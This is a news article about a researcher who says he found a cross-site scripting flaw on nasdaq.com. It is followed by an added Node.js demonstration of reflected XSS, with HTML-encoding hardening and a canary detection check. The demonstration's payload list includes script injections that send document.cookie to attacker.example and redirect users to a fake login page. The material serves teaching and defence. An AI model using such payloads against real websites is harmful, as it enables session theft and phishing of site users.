The NASDAQ exchange’s website was hacked in only 10 minutes by a security expert using nothing more than the Firefox web browser, according to recent reports.
Illia Kolochenko, CEO of the Swiss security firm High-Tech Bridge, told the New York Daily News that he made the hacking attempt after his earlier warnings about the site’s security and vulnerability went ignored.
Kolochenko said the issue was the latest in a series of technology problems for exchanges.
Hacking into the system
Kolochenko said he was able to gain full access to nasdaq.com, the stock exchange’s public website, underlining that the site could be hacked by anybody with the right know-how.
According to Kolochenko, a capable hacker could gain full access to the website within a few days and do whatever he or she wanted with it. One example he gave was that a hacker could post an apparently official statement saying Facebook shares had dropped by 90%, a move which would, of course, cause havoc at the stock exchange.
Kolochenko himself gained access in only 10 minutes, and all he needed was a Firefox browser.
Beyond manipulating content on the site itself, a hacker could use it to phish site users for personal information, raising the very real danger of identity theft.
Speaking on behalf of NASDAQ, a spokesperson told the Daily Mail:
“We work with leading security vendors and have a trained and professional team that evaluates all credible threats across our digital assets.
“We responded to his concerns immediately. We take all information security matters seriously.”
What went wrong?
The security experts at RandomStorm were able to provide some insight on this:
“Mr Kolochenko seems to have identified a Cross-Site Scripting (XSS) vulnerability in the Nasdaq.com web application. XSS is the most common vulnerability affecting web applications today. According to OWASP and other sources, XSS is very widespread and easy to detect; from my experience in detecting and exploiting XSS vulnerabilities for RandomStorm clients, I agree.
“Although XSS is very widespread and easy to detect, that does not mean that it is not a serious issue. Depending on the type of XSS, it can be used to deface the web application, steal users’ authentication sessions, redirect users to phishing web sites and much more.
“Avram, a Web Application Security Engineer also working for RandomStorm, constantly finds XSS and other issues in many of the world’s most visited web applications as part of his bug bounty research.
“I think the main issue with what is being discussed here is that Nasdaq.com took so long to fix the XSS issue after it was reported to them,” the spokesperson continued, “because XSS is so widespread many web administrators have become complacent about it.
“Maybe they should consider starting their own bug bounty program and rewarding security researchers as so many other high profile companies have”.
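The article does not say where on nasdaq.com the flaw was or what the injection looked like, so the following is a generic illustration added here, not Nasdaq’s code and not RandomStorm’s. It shows a reflected XSS in a tiny “search results” renderer, the same renderer hardened with HTML output encoding, the canary-reflection check a tester (or scanner) uses to spot the bug in minutes, and constructed payloads for the three impacts the spokesperson lists: defacement, session theft and redirection to a phishing page. Function names, the `attacker.example` host and the payload strings are all assumptions for the demonstration; it runs under Node.js.

```javascript
// Added example for this article (not Nasdaq's or RandomStorm's code): a
// reflected XSS, its hardened form, and the detection check. Node.js.

// Vulnerable renderer: the user-supplied query is interpolated into the
// HTML response without encoding, so '<' and '>' reach the browser intact.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// HTML-encode the characters that can change meaning in an HTML text node
// or quoted attribute. Order matters: '&' first, so encoded output is not
// re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened renderer: identical page, but the parameter is encoded for the
// HTML text-node context it lands in.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Detection, the way a tester does it from a browser address bar: send a
// canary made of HTML metacharacters and see whether the page reflects it
// byte-for-byte. A renderer that does is injectable. (Constructed canary.)
const CANARY = 'xss<">\'&canary';
function reflectsUnencoded(renderFn) {
  return renderFn(CANARY).includes(CANARY);
}

// Constructed payloads for the three impacts named in the article.
// attacker.example is a reserved documentation name, not a real host.
const PAYLOADS = {
  deface: '<script>document.body.innerHTML="Defaced"</script>',
  sessionTheft:
    '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
  phishRedirect: '<script>location="https://attacker.example/login"</script>',
};

// Crude oracle for the demonstration: does the response contain a live
// <script> element (as opposed to the encoded text "&lt;script&gt;")?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Run each payload through both renderers; returns a table of booleans.
function demo() {
  const results = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    results[name] = {
      vulnerable: containsScriptElement(renderSearchVulnerable(payload)),
      hardened: containsScriptElement(renderSearchSafe(payload)),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable reflects canary:', reflectsUnencoded(renderSearchVulnerable));
  console.log('hardened reflects canary:  ', reflectsUnencoded(renderSearchSafe));
  console.table(demo());
}
```

Two caveats a practitioner would add. Encoding is context-specific: `escapeHtml` is correct for an HTML text node or a double-quoted attribute, but a value inserted into a JavaScript string, a URL, or a CSS block needs the encoder for that context, and a reflection that lands inside an existing `<script>` block is not stopped by HTML encoding at all. And output encoding is the fix, not a blocklist of `<script>`: the `containsScriptElement` check above is only a demonstration oracle, since event-handler attributes and other vectors carry no `<script>` tag.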
An investigation into the matter at NASDAQ continues, though NASDAQ maintains that a close eye is kept on the website at all times.